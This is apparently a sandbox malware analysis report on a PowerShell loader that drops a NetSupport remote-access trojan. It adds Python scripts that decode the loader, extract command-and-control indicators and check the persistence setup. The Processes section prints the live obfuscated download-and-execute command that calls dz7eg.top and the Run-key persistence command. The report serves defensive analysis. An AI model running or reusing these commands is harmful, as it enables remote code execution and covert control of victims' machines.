Malware Analysis Report

2025-06-16 05:06

Sample ID 230530-vsnwlsbc3z
Target rt.php.ps1
SHA256 8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d
Tags
netsupport persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d

Threat Level: Known bad

The file rt.php.ps1 was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-30 17:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-30 17:15

Reported

2023-05-30 17:17

Platform

win7-20230220-en

Max time kernel

29s

Max time network

31s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Network

N/A

Files

memory/1208-58-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

memory/1208-59-0x0000000002020000-0x0000000002028000-memory.dmp

memory/1208-60-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-61-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-62-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-63-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-64-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-65-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-66-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-67-0x0000000002030000-0x00000000020B0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-30 17:15

Reported

2023-05-30 17:17

Platform

win10v2004-20230220-en

Max time kernel

37s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\QNSeJO3wL5Kv\\whost.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe | N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe""

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe
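
The second powershell.exe command line above hides every string behind chains of [char] codes, so neither the cmdlet names nor the URL appear in the clear. The Python below is an added example, not part of the sandbox report or of the sample: it reverses that construction, resolves the new-alias renaming of Invoke-Expression and extracts the download URL. The regular expressions and the "download-and-execute loader" verdict rule are this example's own assumptions about the pattern. Decoded, the command reads: new-alias rzs invoke-expression; $global:block=(New-Object System.Net.WebClient).DownloadString('http://dz7eg.top/515/sdfzw.php?i=' + $(hostname)); rzs $global:block. It fetches a second stage with the victim hostname in the query string and runs it in memory.

```python
import re
from typing import Dict

# The second powershell.exe command line recorded in the behavioral2 process
# list of this report (copied verbatim; only split across lines here).
CAPTURED_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs '
    r'$([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);'
    r'$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) )'
    r'.($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )'
    r'($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));'
    r'rzs $global:block'
)

# $( [char]N + [char]N + ... ) subexpressions: each builds one string from code points.
CHAR_CHAIN = re.compile(r"\$\(\s*((?:\[char\]\d+\s*\+\s*)*\[char\]\d+)\s*\)")
CHAR_CODE = re.compile(r"\[char\](\d+)")
# new-alias <name> <cmdlet>: the script renames Invoke-Expression before calling it.
NEW_ALIAS = re.compile(r"new-alias\s+(\S+)\s+'?([A-Za-z][\w-]*)'?", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"()]+")
IEX_NAMES = {"invoke-expression", "iex"}


def decode_char_chains(text: str) -> str:
    """Replace every $([char]..+[char]..) chain with the single-quoted string it builds."""
    def repl(m):
        return "'" + "".join(chr(int(c)) for c in CHAR_CODE.findall(m.group(1))) + "'"
    return CHAR_CHAIN.sub(repl, text)


def triage(cmdline: str) -> Dict[str, object]:
    """Decode the command line and summarise what it does (verdict rule is an assumption)."""
    decoded = decode_char_chains(cmdline)
    lowered = decoded.lower()
    aliases = {name.lower(): target.lower() for name, target in NEW_ALIAS.findall(decoded)}
    # Names under which Invoke-Expression can be called in this script: the cmdlet,
    # its built-in alias, and anything new-alias pointed at it.
    iex_names = IEX_NAMES | {a for a, t in aliases.items() if t in IEX_NAMES}
    # "<iex-name> $var": executing data held in a variable rather than a literal.
    executes_variable = any(
        re.search(r"(?:^|[;|\s])" + re.escape(n) + r"\s+\$", decoded, re.IGNORECASE)
        for n in iex_names
    )
    downloads = "downloadstring" in lowered or "downloadfile" in lowered
    return {
        "decoded": decoded,
        "aliases": aliases,
        "urls": URL.findall(decoded),
        "downloads": downloads,
        "executes_variable": executes_variable,
        "sends_hostname": "$(hostname)" in decoded,
        "verdict": "download-and-execute loader" if downloads and executes_variable else "review manually",
    }


if __name__ == "__main__":
    for key, value in triage(CAPTURED_CMDLINE).items():
        print(f"{key}: {value}")
```

Running the script prints the decoded command, the alias map, the URL list and the verdict; the same decoder applies to any command line that uses the [char] chain construction, not only this sample.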

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp
US | 8.8.8.8:53 | dz7eg.top | udp
US | 143.244.162.145:80 | dz7eg.top | tcp
US | 8.8.8.8:53 | 145.162.244.143.in-addr.arpa | udp
US | 8.8.8.8:53 | 4.36.251.142.in-addr.arpa | udp
US | 8.8.8.8:53 | fduic.top | udp
DE | 167.235.159.22:443 | fduic.top | tcp
US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp
GB | 62.172.138.67:80 | geo.netsupportsoftware.com | tcp
US | 8.8.8.8:53 | 22.159.235.167.in-addr.arpa | udp
US | 8.8.8.8:53 | 67.138.172.62.in-addr.arpa | udp
US | 8.8.8.8:53 | 32.18.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp
IE | 20.50.73.11:443 | | tcp
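
The network table above mixes three kinds of rows: the reverse (PTR) lookups the sandbox resolver performs for peers it has seen, the forward DNS lookups that precede each connection, and the connections themselves. The Python below is an added example, not part of the report: it parses the table as printed and separates operator infrastructure from that noise. Allowlisting geo.netsupportsoftware.com is an analyst assumption (it is the NetSupport vendor's geolocation endpoint that the client contacts on start, which identifies the tool rather than the operator); the 20.50.73.11:443 connection has no domain in the report and is listed for manual review rather than classified.

```python
import re
from typing import Dict, List

# The Network table of the behavioral2 run, copied from this report as
# country, destination, domain, protocol (the last row has no domain).
NETWORK_TABLE = """\
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 dz7eg.top udp
US 143.244.162.145:80 dz7eg.top tcp
US 8.8.8.8:53 145.162.244.143.in-addr.arpa udp
US 8.8.8.8:53 4.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 fduic.top udp
DE 167.235.159.22:443 fduic.top tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 62.172.138.67:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 22.159.235.167.in-addr.arpa udp
US 8.8.8.8:53 67.138.172.62.in-addr.arpa udp
US 8.8.8.8:53 32.18.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
IE 20.50.73.11:443 tcp
"""

RESOLVERS = {"8.8.8.8"}
# Analyst allowlist (assumption): the NetSupport vendor geolocation endpoint that the
# client contacts on start. It identifies the tool, not the operator's infrastructure.
ALLOWLISTED = {"geo.netsupportsoftware.com"}
PTR_SUFFIX = ".in-addr.arpa"


def parse_rows(table: str) -> List[Dict[str, object]]:
    rows = []
    for line in table.strip().splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:          # bare IP connection, no domain recorded
            country, dest, proto = parts
            domain = ""
        else:
            continue
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto})
    return rows


def ptr_to_ip(name: str) -> str:
    """'145.162.244.143.in-addr.arpa' -> '143.244.162.145' (PTR names reverse the octets)."""
    return ".".join(reversed(name[: -len(PTR_SUFFIX)].split(".")))


def classify(row: Dict[str, object]) -> str:
    domain = str(row["domain"])
    if domain.endswith(PTR_SUFFIX):
        return "ptr-lookup"            # reverse lookups performed by the sandbox itself
    if row["ip"] in RESOLVERS and row["port"] == 53:
        return "dns-lookup"            # the resolution step; the TCP row carries the real peer
    if domain in ALLOWLISTED:
        return "allowlisted"
    if domain:
        return "c2-candidate"
    return "unattributed"              # connection with no name; review by IP and ASN


def extract_iocs(table: str) -> Dict[str, object]:
    by_class: Dict[str, List[Dict[str, object]]] = {}
    for row in parse_rows(table):
        by_class.setdefault(classify(row), []).append(row)
    c2 = sorted({(r["domain"], r["ip"], r["port"]) for r in by_class.get("c2-candidate", [])})
    unattributed = sorted({(r["ip"], r["port"]) for r in by_class.get("unattributed", [])})
    resolved = sorted({r["domain"] for r in by_class.get("dns-lookup", [])})
    ptr_targets = sorted({ptr_to_ip(str(r["domain"])) for r in by_class.get("ptr-lookup", [])})
    # A C2 candidate that was never resolved means a hard-coded IP rather than a domain.
    unresolved_c2 = [d for d, _, _ in c2 if d not in resolved]
    return {"c2": c2, "unattributed": unattributed, "resolved": resolved,
            "ptr_targets": ptr_targets, "unresolved_c2": unresolved_c2}


if __name__ == "__main__":
    for key, value in extract_iocs(NETWORK_TABLE).items():
        print(f"{key}: {value}")
```

For this report the C2 candidates reduce to dz7eg.top (143.244.162.145:80, the host the decoded PowerShell loader downloads from) and fduic.top (167.235.159.22:443); the PTR rows only echo those same peer addresses back and add no indicator of their own.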

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nksic0el.kdc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3760-133-0x000001D3E5020000-0x000001D3E5042000-memory.dmp

memory/3760-143-0x000001D3E50A0000-0x000001D3E50B0000-memory.dmp

memory/3760-144-0x000001D3E50A0000-0x000001D3E50B0000-memory.dmp

memory/4176-154-0x00000284C6E60000-0x00000284C6E70000-memory.dmp

memory/4176-155-0x00000284C6E60000-0x00000284C6E70000-memory.dmp

memory/4176-156-0x00000284C6E60000-0x00000284C6E70000-memory.dmp

memory/3760-160-0x000001D3E77D0000-0x000001D3E77DA000-memory.dmp

memory/3760-161-0x000001D3E7800000-0x000001D3E7812000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/388-190-0x000001EEFDD80000-0x000001EEFDD90000-memory.dmp

memory/388-191-0x000001EEFDD80000-0x000001EEFDD90000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f5f268a3d8760169bde3db6e00da5e6c
SHA1 00dc2443a967bf09147612f53ea5fc6a2cfb0b40
SHA256 b0f800d487f826601ef6a21ddd141c41d57182c1601e2adf1c0132b98c8d73b5
SHA512 c067de9cfefea861a08a29a1b10bcf93d360ec555bdd9fd24fb8f6ce6be432961a1acc4ccef786e953d86ef836db27fdef5fd5951930edd00e1c4fcfa3a9d67e

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe

MD5 c0eb3eac96511077dafc0afa64c6388c
SHA1 33e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256 eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA512 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICL32.dll

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICL32.DLL

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICHEK.DLL

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\client32.ini

MD5 5d2b788f10e973fce372fa2e4ececd4e
SHA1 40cc5404b896dd6ed657bba39ffdb6d63f45e9a1
SHA256 483b4c008ab680dd0958f5f09c55d6dc35f90fca1c3835fb864a1e8fcb598475
SHA512 168c7d962ab5b813e426eca03fd718c05a34d393b2fd79b3685fdcb408ae29399c4b6de8decfa893f039eb871425579cffdbf55465830a7801c065491c95ba20

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\NSM.LIC

MD5 390c964070626a64888d385c514f568e
SHA1 a556209655dcb5e939fd404f57d199f2bb6da9b3
SHA256 ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54
SHA512 f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

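
The Run value recorded under "Adds Run key to start application" and the file list above belong together: the persisted image whost.exe sits in the same QNSeJO3wL5Kv directory under Roaming as client32.ini, NSM.LIC, PCICL32.dll, HTCTL32.DLL, pcichek.dll and pcicapi.dll, the component set of a NetSupport Manager client. The Python below is an added example, not part of the report: it parses the indicator line as the sandbox prints it, checks whether the Run value points into a user-writable profile path, and looks for the NetSupport component set beside the persisted binary. The indicator regex, the user-writable heuristic and the threshold of three components are this example's assumptions.

```python
import ntpath
import re
from typing import Dict, List, Optional

# Persistence indicator from the "Adds Run key to start application" signature of this
# report, copied verbatim (the sandbox escapes backslashes inside the value data).
RUN_KEY_INDICATOR = (
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000'
    r'\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = '
    r'"C:\\Users\\Admin\\AppData\\Roaming\\QNSeJO3wL5Kv\\whost.exe"'
)

# Distinct paths from the Files section of the behavioral2 run.
DROPPED_FILES = [
    r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nksic0el.kdc.ps1",
    r"C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log",
    r"C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe",
    r"C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICL32.dll",
    r"C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcichek.dll",
    r"C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcicapi.dll",
    r"C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\MSVCR100.dll",
    r"C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\client32.ini",
    r"C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\NSM.LIC",
    r"C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\HTCTL32.DLL",
]

# NetSupport Manager client components named in this report's Files section.
NETSUPPORT_COMPONENTS = {"client32.ini", "nsm.lic", "pcicl32.dll", "htctl32.dll", "pcichek.dll", "pcicapi.dll"}

# Shape of the sandbox indicator line (assumption): Set value (<type>) <key>\<name> = "<data>"
RUN_VALUE = re.compile(
    r'Set value \((?P<type>\w+)\) (?P<key>\\REGISTRY\\\S+?\\CurrentVersion\\Run)'
    r'\\(?P<name>\S+) = "(?P<data>[^"]*)"'
)
# Heuristic (assumption): an autostart image inside a user profile is not an installed program.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)


def parse_run_value(indicator: str) -> Optional[Dict[str, str]]:
    """Return key, value name and the unescaped image path, or None if not a Run-key write."""
    m = RUN_VALUE.search(indicator)
    if not m:
        return None
    image = m.group("data").replace("\\\\", "\\").strip('"')
    return {"type": m.group("type"), "key": m.group("key"), "name": m.group("name"), "image": image}


def components_beside(image: str, dropped: List[str]) -> List[str]:
    """NetSupport component files written to the same directory as the persisted binary."""
    directory = ntpath.dirname(image).lower()
    names = {ntpath.basename(p).lower() for p in dropped if ntpath.dirname(p).lower() == directory}
    return sorted(names & NETSUPPORT_COMPONENTS)


def triage(indicator: str, dropped: List[str]) -> Dict[str, object]:
    value = parse_run_value(indicator)
    if value is None:
        return {"value": None, "components": [], "findings": [], "verdict": "not a Run-key indicator"}
    findings = []
    if USER_WRITABLE.search(value["image"]):
        findings.append("Run value points into the user profile (AppData), not an installed program")
    components = components_beside(value["image"], dropped)
    if len(components) >= 3:
        findings.append("NetSupport client components sit beside the persisted binary")
    verdict = "persistence for a NetSupport client" if len(findings) == 2 else "review"
    return {"value": value, "components": components, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage(RUN_KEY_INDICATOR, DROPPED_FILES).items():
        print(f"{key}: {value}")
```

The same two checks transfer to live hosts: enumerate HKCU\...\CurrentVersion\Run values, flag any image under a user profile, and inspect that image's directory for the NetSupport component names before deciding whether the entry is an administrator's legitimate install or a dropped client.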